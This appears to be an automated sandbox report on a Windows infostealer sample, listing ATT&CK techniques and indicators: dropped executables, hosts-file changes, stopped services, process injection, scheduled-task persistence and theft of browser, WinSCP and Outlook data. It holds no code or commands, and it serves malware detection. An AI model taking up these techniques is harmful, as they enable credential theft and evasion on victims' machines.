16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Analysis

max time kernel
150s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
03-06-2024 07:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score

8^/10

collection discovery evasion execution persistence spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

81 644 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

644 powershell.exe
3892 powershell.exe
3320 powershell.exe
5960 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

updater.exemsdr.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts updater.exe
File created C:\Windows\system32\drivers\etc\hosts msdr.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

flow	pid	process
81	644	powershell.exe

pid	process
644	powershell.exe
3892	powershell.exe
3320	powershell.exe
5960	powershell.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe
File created	C:\Windows\system32\drivers\etc\hosts	msdr.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

New Text Document mod.exeriff.exeriff.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	riff.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	riff.exe

Executes dropped EXE 10 IoCs

Processes:

riff.exekano.exeUAC.exeriff.exetor-real.exeriff.exemdll.exemsdr.exeS1.exeupdater.exe

pid process

448 riff.exe
4776 kano.exe
3168 UAC.exe
3476 riff.exe
3112 tor-real.exe
4388 riff.exe
5112 mdll.exe
2240 msdr.exe
2584 S1.exe
5224 updater.exe

pid	process
448	riff.exe
4776	kano.exe
3168	UAC.exe
3476	riff.exe
3112	tor-real.exe
4388	riff.exe
5112	mdll.exe
2240	msdr.exe
2584	S1.exe
5224	updater.exe

Loads dropped DLL 10 IoCs

Processes:

tor-real.exe

pid	process
3112	tor-real.exe
3112	tor-real.exe
3112	tor-real.exe
3112	tor-real.exe
3112	tor-real.exe
3112	tor-real.exe
3112	tor-real.exe
3112	tor-real.exe
3112	tor-real.exe
3112	tor-real.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

riff.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	riff.exe
Key opened	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	riff.exe
Key opened	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	riff.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

91 ip-api.com

flow	ioc
91	ip-api.com

Drops file in System32 directory 8 IoCs

Processes:

powershell.exeupdater.exepowershell.exemsdr.exesvchost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	updater.exe
File created	C:\Windows\SysWOW64\msdr.exe	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	msdr.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

kano.exe

pid process

4776 kano.exe
4776 kano.exe
4776 kano.exe
4776 kano.exe

pid	process
4776	kano.exe
4776	kano.exe
4776	kano.exe
4776	kano.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

msdr.exeupdater.exe

description	pid	process	target process
PID 2240 set thread context of 4332	2240	msdr.exe	dialer.exe
PID 5224 set thread context of 5364	5224	updater.exe	dialer.exe
PID 5224 set thread context of 5308	5224	updater.exe	dialer.exe
PID 5224 set thread context of 6124	5224	updater.exe	dialer.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

4796 sc.exe
4964 sc.exe
720 sc.exe
5460 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4796	sc.exe
4964	sc.exe
720	sc.exe
5460	sc.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mdll.exewmiprvse.exeS1.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mdll.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mdll.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	S1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	S1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1132 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2604 timeout.exe

pid	process
1132	schtasks.exe

pid	process
2604	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 49 IoCs

Processes:

powershell.exechrome.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133618734907319859"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exepowershell.exepowershell.exeriff.exemdll.exe

pid	process
2172	chrome.exe
2172	chrome.exe
3892	powershell.exe
3892	powershell.exe
3892	powershell.exe
644	powershell.exe
644	powershell.exe
644	powershell.exe
3476	riff.exe
3476	riff.exe
3476	riff.exe
3476	riff.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe
5112	mdll.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

2172 chrome.exe
2172 chrome.exe
2172 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

New Text Document mod.exechrome.exeriff.exepowershell.exepowershell.exeriff.exe

description	pid	process
Token: SeDebugPrivilege	3192	New Text Document mod.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeDebugPrivilege	448	riff.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeDebugPrivilege	644	powershell.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeDebugPrivilege	3476	riff.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe
Token: SeCreatePagefilePrivilege	2172	chrome.exe
Token: SeShutdownPrivilege	2172	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

chrome.exe

pid	process
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe
2172	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

kano.exeriff.exe

pid process

4776 kano.exe
3476 riff.exe

pid	process
4776	kano.exe
3476	riff.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

New Text Document mod.exechrome.exe

description	pid	process	target process
PID 3192 wrote to memory of 2172	3192	New Text Document mod.exe	chrome.exe
PID 3192 wrote to memory of 2172	3192	New Text Document mod.exe	chrome.exe
PID 2172 wrote to memory of 3008	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 3008	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 1244	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 3044	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 3044	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe
PID 2172 wrote to memory of 4476	2172	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

Processes:

riff.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	riff.exe

outlook_win_path 1 IoCs

Processes:

riff.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	riff.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:392

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1008

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1120

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1192

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2800

C:\Users\Admin\AppData\Local\RobloxSecurity\riff.exe
C:\Users\Admin\AppData\Local\RobloxSecurity\riff.exe
2⤵
- Executes dropped EXE
PID:4388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1416

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1548

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1924

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1936

C:\Windows\System32\svchost.exe
